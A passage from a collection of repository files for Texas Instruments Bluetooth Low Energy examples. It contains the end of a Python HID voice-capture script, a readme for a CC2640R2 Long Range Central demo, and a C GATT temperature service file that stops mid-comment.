callback\n self.setHIDFilter(vendor_id, product_id)\n\n def setHIDFilter(self, vendor_id, product_id):\n self.logger.info(\"Setting Vendor ID: 0x%04X\" % vendor_id)\n self.vendor_id = vendor_id\n self.logger.info(\"Setting Product ID: 0x%04X\" % product_id)\n self.product_id = product_id\n return\n\n def __findSupportedDevices(self, devices):\n targetdevice = None\n\n for device in devices:\n #print(device)\n device.open()\n\n \"\"\" Find all report IDs in this device \"\"\"\n report_ids = list()\n input_reports = device.find_input_reports()\n for report in input_reports:\n report_ids.append(report.report_id)\n\n #print(report_ids)\n \"\"\" If we have all the report IDs required, then we found the device we need to talk with \"\"\"\n if self._VENDOR_IDS.issubset(report_ids):\n targetdevice = device\n device.close()\n break\n\n device.close()\n\n self.logger.debug(\"Found these devices: \")\n self.logger.debug(targetdevice)\n self.hid_device = targetdevice\n return\n\n def open(self):\n devices = 
hid.HidDeviceFilter(vendor_id=self.vendor_id,\n                                      product_id=self.product_id).get_devices()\n\n        self.__findSupportedDevices(devices)\n        if self.hid_device is not None:\n            self.hid_device.open()\n            self.hid_device.set_raw_data_handler(self.__hid_callbackFxn)\n            self.logger.info(\"Opened\")\n            return True\n        else:\n            self.logger.info(\"Could not open!\")\n            return False\n\n    def close(self):\n        if self.hid_device is not None:\n            self.logger.info(\"Closed\")\n            self.hid_device.close()\n\n    def isConnected(self):\n        if self.hid_device is not None:\n            return self.hid_device.is_plugged()\n        return False\n\n\nclass HIDLegacy(HIDTransport, TransportBase):\n\n    _VENDOR_IDS = set([3])\n\n    _START_REPORT = [4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n    _STOP_REPORT = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n\n    _SEQUENCE_ORDER = (  1,   9,  17,  25,  33,  41,  49,  57,  65,  73,\n                        81,  89,  97, 105, 113, 121, 129, 137, 145, 153,\n                       161, 169, 177, 185, 193, 201, 209, 217, 225, 233,\n                       241, 249)\n\n    class Event(object):\n        Start = \"Start\"\n        Stop = \"Stop\"\n        Data = \"Data\"\n\n    def __init__(self, callbackFunction, vendor_id=None, product_id=None):\n        self.logger = logging.getLogger(self.__class__.__name__)\n        self.logger.info(\"Init\")\n\n        HIDTransport.__init__(self,\n                              callback=self._callback,\n                              vendor_id=vendor_id,\n                              product_id=product_id)\n\n        self._callbackFxn = callbackFunction\n        self._audioData = bytearray()\n        self._frameCnt = 0\n        self._checkData = False\n        self._state = HIDLegacy.Event.Stop\n        self._sequenceIndex = 1\n        return\n\n    def _callback(self, data):\n        #self.logger.debug(\"HID Callback: Data: %s\" % data)\n\n        if data[1:21] == HIDLegacy._START_REPORT:\n            self.logger.info(\"Start\")\n\n            if self._checkData:\n                self._sequenceIndex = 1\n                if self._state is not HIDLegacy.Event.Stop:\n                    self.logger.error(\"Received \\\"Start\\\" while in \\\"%s\\\" state!\" % self._state)\n\n            self._state = HIDLegacy.Event.Start\n\n            self._frameCnt = 0\n            self._audioData = b''\n\n        elif data[1:21] == HIDLegacy._STOP_REPORT:\n            self.logger.info(\"Stop\")\n\n            if self._checkData:\n                if self._state is not HIDLegacy.Event.Data:\n                    self.logger.error(\"Received \\\"Stop\\\" while in \\\"%s\\\" state!\" % self._state)\n                if self._frameCnt != 0:\n                    self.logger.error(\"Received \\\"Stop\\\" without having all of the audio frames!\")\n\n            self._state = HIDLegacy.Event.Stop\n\n            \"\"\" Perform supplied application function callback\"\"\"\n            if self._callbackFxn is not None:\n                self._callbackFxn(self._audioData)\n\n        else:\n            self.logger.debug(\"Data[%d]\" % self._frameCnt)\n\n            if self._checkData:\n                if self._state is HIDLegacy.Event.Start and self._frameCnt != 0:\n                    self.logger.warning(\"Received \\\"Data\\\" where frameCnt is \\\"%d\\\"\" % self._frameCnt)\n\n            self._state = HIDLegacy.Event.Data\n\n            if self._frameCnt == 0:\n                self.logger.debug(\"%s\" % data)\n\n            \"\"\" Experimental check for lost voice frames; not yet validated! 
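 The sender advances the sequence byte by 8 per frame group (see _SEQUENCE_ORDER); any mismatch against the expected entry is counted as dropped frames. 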
\"\"\"\n if self._checkData:\n if data[1] is not HIDLegacy._SEQUENCE_ORDER[self._sequenceIndex]:\n for i, x in enumerate(HIDLegacy._SEQUENCE_ORDER):\n if x == data[1]:\n self.logger.debug(\"Found pair: %d, %d\" % (i, x))\n self.logger.debug(\"Expected pair: %d, %d\" % (self._sequenceIndex, HIDLegacy._SEQUENCE_ORDER[self._sequenceIndex]))\n\n if i > self._sequenceIndex:\n delta = i - self._sequenceIndex\n else:\n delta = i + len(HIDLegacy._SEQUENCE_ORDER) - self._sequenceIndex\n\n self.logger.warn(\"Dropped %d voice frame(s)\" % delta)\n self._sequenceIndex = i\n self.logger.debug(\"Setting index to %d; delta found %d\" % (self._sequenceIndex, delta))\n break\n\n self._sequenceIndex += 1\n if self._sequenceIndex == len(HIDLegacy._SEQUENCE_ORDER):\n self._sequenceIndex = 0\n\n it = iter(data[5:21])\n for x in it:\n self._audioData += pack('B', x)\n else:\n it = iter(data[1:21])\n for x in it:\n self._audioData += pack('B', x)\n\n self._frameCnt += 1\n if self._frameCnt == 5:\n self._frameCnt = 0\n\n\n def setDataValidation(self, boolean):\n self._checkData = boolean\n\n\nclass HIDVoHoGP(HIDTransport, TransportBase):\n\n HID_RPT_ID_VOICE_START_IN = 10\n HID_RPT_ID_VOICE_DATA_IN = 11\n\n _VENDOR_IDS = set([HID_RPT_ID_VOICE_START_IN, HID_RPT_ID_VOICE_DATA_IN])\n\n _SEQUENCE_ORDER = ( 1, 9, 17, 25, 33, 41, 49, 57, 65, 73,\n 81, 89, 97, 105, 113, 121, 129, 137, 145, 153,\n 161, 169, 177, 185, 193, 201, 209, 217, 225, 233,\n 241, 249)\n\n _START_REPORT = [4, 0, 0, 0, 0]\n _STOP_REPORT = [0, 0, 0, 0, 0]\n\n class Event(object):\n Start = \"Start\"\n Stop = \"Stop\"\n Data = \"Data\"\n\n def __init__(self, callbackFunction, vendor_id=None, product_id=None):\n self.logger = logging.getLogger(self.__class__.__name__)\n self.logger.info(\"Init\")\n\n HIDTransport.__init__(self,\n callback=self._callback,\n vendor_id=vendor_id,\n product_id=product_id)\n\n self._callbackFxn = callbackFunction\n self._audioData = bytearray()\n self._frameCnt = 0\n self._checkData = False\n self._state = HIDVoHoGP.Event.Stop\n self._sequenceIndex = 1\n self._rawFile = None\n return\n\n def _callback(self, data):\n #self.logger.debug(\"HID Callback: Data: %s\" % data)\n\n if data[0] == HIDVoHoGP.HID_RPT_ID_VOICE_START_IN:\n if data[1:6] == HIDVoHoGP._START_REPORT:\n self.logger.info(\"Start\")\n\n if self._checkData:\n self.__sequenceIndex = 1\n if self._state is not HIDVoHoGP.Event.Stop:\n self.logger.error(\"Received \\\"Start\\\" while in \\\"%s\\\" state!\" % self._state)\n if self._rawFile is not None:\n self._rawFile.close()\n self._rawFile = open(time.strftime(\"raw_%Y-%m-%d_%H-%M-%S\")+\".bin\", \"w\")\n self._rawFile.write(\"ST %02X %s\\n\" % (data[1], data[2:6]))\n\n self._state = HIDLegacy.Event.Start\n\n self._frameCnt = 0\n self._audioData = b''\n\n elif data[1:6] == HIDVoHoGP._STOP_REPORT:\n self.logger.info(\"Stop\")\n\n if self._checkData:\n if self._state is not HIDVoHoGP.Event.Data:\n self.logger.error(\"Received \\\"Data\\\" while in \\\"%s\\\" state!\" % self._state)\n if self._frameCnt != 0:\n self.logger.error(\"Received \\\"Stop\\\" without having all of the audio frames!\")\n self._rawFile.write(\"SP %02X %s\\n\" % (data[1], data[2:6]))\n self._rawFile.close()\n self._rawFile = None\n\n self._state = HIDVoHoGP.Event.Stop\n\n \"\"\" Perform supplied application function callback\"\"\"\n if self._callbackFxn is not None:\n self._callbackFxn(self._audioData)\n else:\n self.logger.error(\"Invalid packet: %s\" % data[1:6])\n self.logger.error(\"Data: %s\" % data)\n raise \"Invalid packet\"\n\n elif 
data[0] == HIDVoHoGP.HID_RPT_ID_VOICE_DATA_IN:\n            #self.logger.debug(\"Data[%d]: %s\" % (self._frameCnt, data[1:21]))\n\n            if self._checkData:\n                if self._state is HIDVoHoGP.Event.Start and self._frameCnt != 0:\n                    self.logger.warning(\"Received \\\"Data\\\" where frameCnt is \\\"%d\\\"\" % self._frameCnt)\n\n            self._state = HIDVoHoGP.Event.Data\n\n            \"\"\" Experimental check for lost voice frames; not yet validated! \"\"\"\n            if self._checkData:\n                if self._frameCnt == 0:\n                    if data[1] != HIDVoHoGP._SEQUENCE_ORDER[self._sequenceIndex]:\n                        for i, x in enumerate(HIDVoHoGP._SEQUENCE_ORDER):\n                            if x == data[1]:\n                                self.logger.debug(\"Found pair: %d, %d\" % (i, x))\n                                self.logger.debug(\"Expected pair: %d, %d\" % (self._sequenceIndex, HIDVoHoGP._SEQUENCE_ORDER[self._sequenceIndex]))\n\n                                if i > self._sequenceIndex:\n                                    delta = i - self._sequenceIndex\n                                else:\n                                    delta = i + len(HIDVoHoGP._SEQUENCE_ORDER) - self._sequenceIndex\n\n                                self.logger.warning(\"Dropped %d voice frame(s)\" % delta)\n                                self._sequenceIndex = i\n                                self.logger.debug(\"Setting index to %d; delta found %d\" % (self._sequenceIndex, delta))\n                                break\n\n                    self._sequenceIndex += 1\n                    if self._sequenceIndex == len(HIDVoHoGP._SEQUENCE_ORDER):\n                        self._sequenceIndex = 0\n\n                    string = 'D0 {seqNum:3d} {array:>120}\\n'.format(seqNum=data[1],\n                                                                    array=', '.join('0x{0:02X}'.format(x) for x in data[5:]))\n                else:\n                    string = 'D{frameCnt} {array:>120}\\n'.format(frameCnt=self._frameCnt,\n                                                                 array=', '.join('0x{0:02X}'.format(x) for x in data[1:]))\n                self._rawFile.write(string)\n\n            if self._frameCnt == 0:\n                it = iter(data[5:21])\n            else:\n                it = iter(data[1:21])\n\n            for x in it:\n                self._audioData += pack('B', x)\n\n            self._frameCnt += 1\n            if self._frameCnt == 5:\n                self._frameCnt = 0\n        else:\n            raise ValueError(\"Unexpected HID report ID: %d\" % data[0])\n\n    def setDataValidation(self, boolean):\n        self._checkData = boolean\n\n\ndef set_debug_level(loggers, formatter):\n\n    ch = logging.StreamHandler()\n    ch.setFormatter(formatter)\n\n    for log in loggers:\n\n        logger = logging.getLogger(log)\n\n        if \"HIDVoHoGP\" in log:\n            # Log everything for the VoHoGP transport\n            logger.setLevel(logging.DEBUG)\n\n        if \"HIDLegacy\" in log:\n            # Log everything for the legacy transport\n            logger.setLevel(logging.DEBUG)\n\n        logger.addHandler(ch)\n\n\ndef main():\n    formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n    set_debug_level([\"HIDLegacy\", \"HIDVoHoGP\"], formatter)\n\n    appLogger = logging.getLogger(\"Test App\")\n    appLogger.setLevel(logging.INFO)\n    ch = logging.StreamHandler()\n    ch.setFormatter(formatter)\n    appLogger.addHandler(ch)\n\n    def testfunction(data):\n        appLogger.info(\"Test Callback with %s bytes\" % len(data))\n\n    #hid = HIDLegacy(testfunction, vendor_id=0x000d, product_id=0x0000)\n    hid = HIDVoHoGP(testfunction, vendor_id=0x000d, product_id=0x0000)\n    hid.setDataValidation(True)\n    hid.open()\n\n    while hid.isConnected():\n        sleep(1)\n\n    hid.close()\n\n\nif __name__ == '__main__':\n    main()\n"
},
{
"alpha_fraction": 0.7145828008651733,
"alphanum_fraction": 0.732778787612915,
"avg_line_length": 31.601694107055664,
"blob_id": "f278bd385339e56d1ab6a3bcf6565856cf881a16",
"content_id": "85a10e45fd9bab2a0b7858b0079126ae8c6e871d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3847,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 118,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/ble5apps/longrange_central/readme.md",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "# BLE5-Stack Long Range Central\n\n## Functional Overview\n\nThis example page will demonstrate the Bluetooth™ 5 Long Range\ncapabilities of the Texas Instruments CC2640R2 SDK's BLE5-Stack.\n\nThis project is a modified Simple Central sample application from the\nBLE5-Stack component of the SDK.\n\nThis list contains the changes from the standard Simple Central example:\n- Removed the Simple GATT Profile\n- Added Support for a custom profile called Throughput Profile\n- Added Support for a custom profile called Temperature Profile\n - Based on the [Sensor Tag's Temperature profile](http://processors.wiki.ti.com/index.php/CC2650_SensorTag_User's_Guide#IR_Temperature_Sensors)\n\nThe Long Range Central only connects to peripherals that support the Throughput\nand Temperature profiles. To connect, the Central and Peripheral devices must be\nwithin the 1M PHY range. Once connected, the Central takes the follow steps:\n\n1. The discovery of the Throughput and Temperature Characteristics\n1. A GATT write to the Throughput PHY Characteristic to have the peripheral\n start negotiation the use of the Coded PHY (S8).\n1. Update the LED status indicating that the Central is connected to the\n Peripheral.\n1. Enabling GATT Notifications for the Temperature Data Characteristic\n\n## Project Hardware\n- 1 CC2650R2 Launchpad\n- 1 UART Terminal on PC\n\n### LED Output\n\n- RED: Solid RED indicates the device is not connected to a peripheral.\n- GREEN: Blinking GREEN indicates the device is connected to a peripheral in\n using the Long Range Coded PHY (S8).\n\n### Two Button Menu\n\nThe Two Button Menu system is designed to utilize the two push buttons available\non the CC2640R2 Launchpad. The left button (BTN1) is always used to cycle\nbetween options. The right button (BTN2) is used to activate the selected action\nor item.\n\nThe Two Button Menu is set up by default to utilize the back channel UART\npresent on the Launchpad as it's display.\n\n### Running the Demo\n\n1. Compile and load the projects:\n - First build and load `ble5_longrange_central_cc2640r2lp_stack`\n - Next build and load `ble5_longrange_central_cc2640r2lp_app`\n\n1. Connect to the Launchpad via PuTTY (or other serial console emulator). For\n instructions on connecting via PuTTY, please see our [FAQ page](faq.md).\n\n1. After connecting to PuTTY, you will be presented with the Two Button Menu\n system prompting you for actions. Select 'Scan/Connect Menu' by pressing the\n right button (BTN2).\n\n ```\n *Texas Instruments Bluetooth 5 Long Range Demo\n\n +Scan/Connect Menu >\n\n This Device's BDADDR : 0x<BDADDR>\n ```\n\n1. Then select \"Scan For Devices\" menu option by pressing the right button (BTN2).\n\n ```\n *Scan/Connect Menu\n < Next Item\n Scan for Devices >\n +Upper Menu\n This Device's BDADDR : 0x<BDADDR>\n ```\n\n1. After Scanning is performed, choose the desired device to connect to by\n pressing the right button (BTN2). Note: Only peripherals that support both\n the Throughput and Temperature profiles will be listed.\n\n ```\n *Scan/Connect Menu\n < Next Item\n Select Next Device >\n Connect to Selected Device\n Scan for Devices\n +Upper Menu\n 2 Devices Found\n\n Scanned Device 1\n 0x<BDADDR>\n ```\n\n1. Press the left button (BTN1) to move to the next action, \"Connect to\n Selected Device\". 
Then use the right button (BTN2) to begin connecting to\n the displayed device.\n\n After a connection is successful, you will be presented with new menu\n options:\n\n ```\n *Texas Instruments Bluetooth 5 Long Range Demo\n < Next Item\n Toggle RSSI Readings\n Disconnect\n PHY Update Complete\n ```\n\n As well as connection details in the UART display:\n\n ```\n Peer Device : 0x<BDADDR>\n Current PHY: Coded:S8\n RSSI -dBm: 65\n Object Temperature: 22 (C)\n ```\n"
},
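The readme above centers on a single GATT write that asks the peripheral to negotiate the Coded PHY (S8). Below is a minimal sketch of such a write using the TI BLE-Stack GATT API (the same attWriteReq_t / GATT_WriteCharValue pattern used by the ANCS example later in this collection). The handle `throughputPhyHdl` and the index value `PHY_CODED_S8_IDX` are illustrative assumptions; the Throughput Profile's actual handle and value encoding are not shown in this readme.

```c
#include "icall_ble_api.h"

// Hypothetical PHY index understood by the peripheral's Throughput Profile.
#define PHY_CODED_S8_IDX 0x02

// Sketch: write one byte to the (previously discovered) Throughput PHY
// characteristic so the peripheral starts the switch to the Coded S8 PHY.
static bStatus_t LongRangeCentral_requestCodedPhy(uint16_t connHandle,
                                                  uint16_t throughputPhyHdl,
                                                  uint8_t selfEntity)
{
  bStatus_t status;
  attWriteReq_t req;

  // Allocate the stack buffer for a 1-byte ATT Write Request.
  req.pValue = GATT_bm_alloc(connHandle, ATT_WRITE_REQ, 1, NULL);
  if (req.pValue == NULL)
  {
    return FAILURE;
  }

  req.handle = throughputPhyHdl;
  req.len = 1;
  req.pValue[0] = PHY_CODED_S8_IDX;

  // Signature and command must be set to zero for a plain write request.
  req.sig = 0;
  req.cmd = 0;

  status = GATT_WriteCharValue(connHandle, &req, selfEntity);
  if (status != SUCCESS)
  {
    // On failure the stack does not consume the buffer; free it here.
    GATT_bm_free((gattMsg_t *)&req, ATT_WRITE_REQ);
  }
  return status;
}
```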
{
"alpha_fraction": 0.5890128016471863,
"alphanum_fraction": 0.5943824648857117,
"avg_line_length": 31.218631744384766,
"blob_id": "191aa7df65d7e61430ea221d0428d3bb8ff4dfbd",
"content_id": "40f85da3baf9a5acdc130f9057a34139e36ce53c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 16947,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 526,
"path": "/source/ti/ble5stack/profiles/temperature/temperature_service.c",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (c) 2017, Texas Instruments Incorporated\n * All rights reserved.\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n *\n * * Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n *\n * * Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in the\n * documentation and/or other materials provided with the distribution.\n *\n * * Neither the name of Texas Instruments Incorporated nor the names of\n * its contributors may be used to endorse or promote products derived\n * from this software without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n * THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\n * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR\n * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,\n * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n */\n/*\n * ======== temperature_service.c ========\n */\n\n\n\n/*********************************************************************\n * INCLUDES\n */\n#include <string.h>\n\n#include \"bcomdef.h\"\n#include \"OSAL.h\"\n#include \"linkdb.h\"\n#include \"att.h\"\n#include \"gatt.h\"\n#include \"gatt_uuid.h\"\n#include \"gattservapp.h\"\n#include \"gapbondmgr.h\"\n\n#include \"temperature_service.h\"\n\n/*********************************************************************\n * MACROS\n */\n\n/*********************************************************************\n * CONSTANTS\n */\n\n/*********************************************************************\n * TYPEDEFS\n */\n\n/*********************************************************************\n* GLOBAL VARIABLES\n*/\n\n//! 
UUID for the GATT Primary Service Declaration\nconst uint8_t temperature_service_uuid[ATT_UUID_SIZE] =\n{\n TI_BASE_UUID_128(TEMPERATURE_SERVICE_SERV_UUID)\n};\n\n// Temperature Data characteristic UUID\nconst uint8_t temperature_service_data_uuid[ATT_UUID_SIZE] =\n{\n TI_BASE_UUID_128(TEMPERATURE_SERVICE_DATA_UUID)\n};\n// Temperature Config characteristic UUID\nconst uint8_t temperature_service_config_uuid[ATT_UUID_SIZE] =\n{\n TI_BASE_UUID_128(TEMPERATURE_SERVICE_CONFIG_UUID)\n};\n// Temperature Period characteristic UUID\nconst uint8_t temperature_service_period_uuid[ATT_UUID_SIZE] =\n{\n TI_BASE_UUID_128(TEMPERATURE_SERVICE_PERIOD_UUID)\n};\n\n/*********************************************************************\n * LOCAL VARIABLES\n */\n\nstatic Temperature_ServiceCBs_t *pAppCBs = NULL;\n\n/*********************************************************************\n* Profile Attributes - variables\n*/\n\n// Service declaration\nstatic const gattAttrType_t temperature_serviceDecl = { ATT_UUID_SIZE, temperature_service_uuid };\n\n// Characteristic \"Data\" Properties (for declaration)\nstatic uint8_t temperature_service_data_props = GATT_PROP_READ | GATT_PROP_NOTIFY;\nstatic uint8_t temperature_service_data_val[TEMPERATURE_SERVICE_DATA_LEN] = {0};\nstatic gattCharCfg_t *temperature_service_data_cccd; // This characteristic is notifiable\n\n// Characteristic \"Config\" Properties (for declaration)\nstatic uint8_t temperature_service_config_props = GATT_PROP_READ | GATT_PROP_WRITE;\nstatic uint8_t temperature_service_config_val[TEMPERATURE_SERVICE_CONFIG_LEN] = {0};\n\n// Characteristic \"Period\" Properties (for declaration)\nstatic uint8_t temperature_service_period_props = GATT_PROP_READ | GATT_PROP_WRITE;\nstatic uint8_t temperature_service_period_val[TEMPERATURE_SERVICE_PERIOD_LEN] = {0};\n\n/*********************************************************************\n* Profile Attributes - Table\n*/\n\nstatic gattAttribute_t temperature_serviceAttrTbl[] =\n{\n // Temperature_Service Service Declaration\n {\n { ATT_BT_UUID_SIZE, primaryServiceUUID },\n GATT_PERMIT_READ,\n 0,\n (uint8_t *)&temperature_serviceDecl\n },\n // Data Characteristic Declaration\n {\n { ATT_BT_UUID_SIZE, characterUUID },\n GATT_PERMIT_READ,\n 0,\n &temperature_service_data_props\n },\n // Data Characteristic Value\n {\n { ATT_UUID_SIZE, temperature_service_data_uuid },\n GATT_PERMIT_READ,\n 0,\n temperature_service_data_val\n },\n\n // Client Characteristic Configuration (CCCD) for the Data Characteristic\n {\n { ATT_BT_UUID_SIZE, clientCharCfgUUID },\n GATT_PERMIT_READ | GATT_PERMIT_WRITE,\n 0,\n (uint8 *)&temperature_service_data_cccd\n },\n\n // Config Characteristic Declaration\n {\n { ATT_BT_UUID_SIZE, characterUUID },\n GATT_PERMIT_READ,\n 0,\n &temperature_service_config_props\n },\n // Config Characteristic Value\n {\n { ATT_UUID_SIZE, temperature_service_config_uuid },\n GATT_PERMIT_READ | GATT_PERMIT_WRITE,\n 0,\n temperature_service_config_val\n },\n // Period Characteristic Declaration\n {\n { ATT_BT_UUID_SIZE, characterUUID },\n GATT_PERMIT_READ,\n 0,\n &temperature_service_period_props\n },\n // Period Characteristic Value\n {\n { ATT_UUID_SIZE, temperature_service_period_uuid },\n GATT_PERMIT_READ | GATT_PERMIT_WRITE,\n 0,\n temperature_service_period_val\n },\n};\n\n/*********************************************************************\n * LOCAL FUNCTIONS\n */\nstatic bStatus_t Temperature_Service_ReadAttrCB( uint16 connHandle,\n gattAttribute_t *pAttr, uint8 *pValue, uint16 *pLen, uint16 offset,\n uint16 maxLen, uint8 method );\nstatic bStatus_t Temperature_Service_WriteAttrCB( uint16 connHandle,\n 
gattAttribute_t *pAttr, uint8 *pValue, uint16 len, uint16 offset,\n uint8 method );\n\n/*********************************************************************\n * PROFILE CALLBACKS\n */\n// Temperature Service Callbacks\nconst gattServiceCBs_t Temperature_ServiceCBs =\n{\n Temperature_Service_ReadAttrCB, // Read callback function pointer\n Temperature_Service_WriteAttrCB, // Write callback function pointer\n NULL // Authorization callback function pointer\n};\n\n/*********************************************************************\n* PUBLIC FUNCTIONS\n*/\n\n/*\n * Temperature_Service_AddService - Initializes the Temperature_Service service by registering\n * GATT attributes with the GATT server.\n *\n */\nbStatus_t Temperature_Service_AddService( void )\n{\n uint8_t status;\n\n temperature_service_data_cccd =\n (gattCharCfg_t *)ICall_malloc( sizeof(gattCharCfg_t) * linkDBNumConns );\n\n if ( temperature_service_data_cccd == NULL )\n {\n return ( bleMemAllocError );\n }\n\n // Initialize Client Characteristic Configuration attributes\n GATTServApp_InitCharCfg( INVALID_CONNHANDLE, temperature_service_data_cccd );\n\n // Register GATT attribute list and CBs with GATT Server App\n status = GATTServApp_RegisterService( temperature_serviceAttrTbl,\n GATT_NUM_ATTRS( temperature_serviceAttrTbl ),\n GATT_MAX_ENCRYPT_KEY_SIZE,\n &Temperature_ServiceCBs );\n\n return ( status );\n}\n\n/*\n * Temperature_Service_RegisterAppCBs - Registers the application callback function.\n * Only call this function once.\n *\n * appCallbacks - pointer to application callbacks.\n */\nbStatus_t Temperature_Service_RegisterAppCBs(\n Temperature_ServiceCBs_t *appCallbacks )\n{\n if ( appCallbacks )\n {\n pAppCBs = appCallbacks;\n\n return ( SUCCESS );\n }\n else\n {\n return ( bleAlreadyInRequestedMode );\n }\n}\n\n/*\n * Temperature_Service_SetParameter - Set a Temperature_Service parameter.\n *\n * param - Profile parameter ID\n * len - length of data to write\n * value - pointer to data to write. This is dependent on\n * the parameter ID and WILL be cast to the appropriate\n * data type (example: data type of uint16 will be cast to\n * uint16 pointer).\n */\nbStatus_t Temperature_Service_SetParameter( uint8 param, uint8 len,\n void *value )\n{\n bStatus_t ret = SUCCESS;\n switch ( param )\n {\n case TEMPERATURE_SERVICE_DATA:\n if ( len == TEMPERATURE_SERVICE_DATA_LEN )\n {\n memcpy(temperature_service_data_val, value, len);\n\n // See if Notification has been enabled\n ret = GATTServApp_ProcessCharCfg( temperature_service_data_cccd,\n temperature_service_data_val,\n FALSE,\n temperature_serviceAttrTbl,\n GATT_NUM_ATTRS( temperature_serviceAttrTbl ),\n INVALID_TASK_ID,\n Temperature_Service_ReadAttrCB );\n }\n else\n {\n ret = bleInvalidRange;\n }\n break;\n\n case TEMPERATURE_SERVICE_CONFIG:\n if ( len == TEMPERATURE_SERVICE_CONFIG_LEN )\n {\n memcpy(temperature_service_config_val, value, len);\n }\n else\n {\n ret = bleInvalidRange;\n }\n break;\n\n case TEMPERATURE_SERVICE_PERIOD:\n if ( len == TEMPERATURE_SERVICE_PERIOD_LEN )\n {\n memcpy(temperature_service_period_val, value, len);\n }\n else\n {\n ret = bleInvalidRange;\n }\n break;\n\n default:\n ret = INVALIDPARAMETER;\n break;\n }\n return ret;\n}\n\n\n/*\n * Temperature_Service_GetParameter - Get a Temperature_Service parameter.\n *\n * param - Profile parameter ID\n * value - pointer to data to write. 
This is dependent on\n * the parameter ID and WILL be cast to the appropriate\n * data type (example: data type of uint16 will be cast to\n * uint16 pointer).\n */\nbStatus_t Temperature_Service_GetParameter( uint8 param, void *value )\n{\n bStatus_t ret = SUCCESS;\n switch ( param )\n {\n case TEMPERATURE_SERVICE_DATA:\n memcpy(value, temperature_service_data_val,\n TEMPERATURE_SERVICE_DATA_LEN);\n break;\n\n case TEMPERATURE_SERVICE_CONFIG:\n memcpy(value, temperature_service_config_val,\n TEMPERATURE_SERVICE_CONFIG_LEN);\n break;\n\n case TEMPERATURE_SERVICE_PERIOD:\n memcpy(value, temperature_service_period_val,\n TEMPERATURE_SERVICE_PERIOD_LEN);\n break;\n\n default:\n ret = INVALIDPARAMETER;\n break;\n }\n return ret;\n}\n\n\n/*********************************************************************\n * @fn Temperature_Service_ReadAttrCB\n *\n * @brief Read an attribute.\n *\n * @param connHandle - connection message was received on\n * @param pAttr - pointer to attribute\n * @param pValue - pointer to data to be read\n * @param pLen - length of data to be read\n * @param offset - offset of the first octet to be read\n * @param maxLen - maximum length of data to be read\n * @param method - type of read message\n *\n * @return SUCCESS, blePending or Failure\n */\nstatic bStatus_t Temperature_Service_ReadAttrCB( uint16 connHandle,\n gattAttribute_t *pAttr, uint8 *pValue, uint16 *pLen, uint16 offset,\n uint16 maxLen, uint8 method )\n{\n bStatus_t status = SUCCESS;\n\n // See if request is regarding the Update_PDU Characteristic Value\n if ( ! memcmp(pAttr->type.uuid, temperature_service_data_uuid, pAttr->type.len) )\n {\n // Prevent malicious ATT ReadBlob offsets.\n if ( offset > TEMPERATURE_SERVICE_DATA_LEN )\n {\n status = ATT_ERR_INVALID_OFFSET;\n }\n else\n {\n // Transmit as much as possible\n *pLen = MIN(maxLen, TEMPERATURE_SERVICE_DATA_LEN - offset);\n memcpy(pValue, pAttr->pValue + offset, *pLen);\n }\n }\n // See if request is regarding the Update_PHY Characteristic Value\n else if ( ! memcmp(pAttr->type.uuid, temperature_service_config_uuid, pAttr->type.len) )\n {\n // Prevent malicious ATT ReadBlob offsets.\n if ( offset > TEMPERATURE_SERVICE_CONFIG_LEN )\n {\n status = ATT_ERR_INVALID_OFFSET;\n }\n else\n {\n // Transmit as much as possible\n *pLen = MIN(maxLen, TEMPERATURE_SERVICE_CONFIG_LEN - offset);\n memcpy(pValue, pAttr->pValue + offset, *pLen);\n }\n }\n // See if request is regarding the Toggle_Temperature Characteristic Value\n else if ( ! 
memcmp(pAttr->type.uuid, temperature_service_period_uuid, pAttr->type.len) )\n {\n // Prevent malicious ATT ReadBlob offsets.\n if ( offset > TEMPERATURE_SERVICE_PERIOD_LEN )\n {\n status = ATT_ERR_INVALID_OFFSET;\n }\n else\n {\n // Transmit as much as possible\n *pLen = MIN(maxLen, TEMPERATURE_SERVICE_PERIOD_LEN - offset);\n memcpy(pValue, pAttr->pValue + offset, *pLen);\n }\n }\n else\n {\n /*\n * If we get here, that means you've forgotten to add an if clause for a\n * characteristic value attribute in the attribute table that has READ\n * permissions.\n */\n *pLen = 0;\n status = ATT_ERR_ATTR_NOT_FOUND;\n }\n\n return status;\n}\n\n\n/*********************************************************************\n * @fn Temperature_Service_WriteAttrCB\n *\n * @brief Validate attribute data prior to a write operation\n *\n * @param connHandle - connection message was received on\n * @param pAttr - pointer to attribute\n * @param pValue - pointer to data to be written\n * @param len - length of 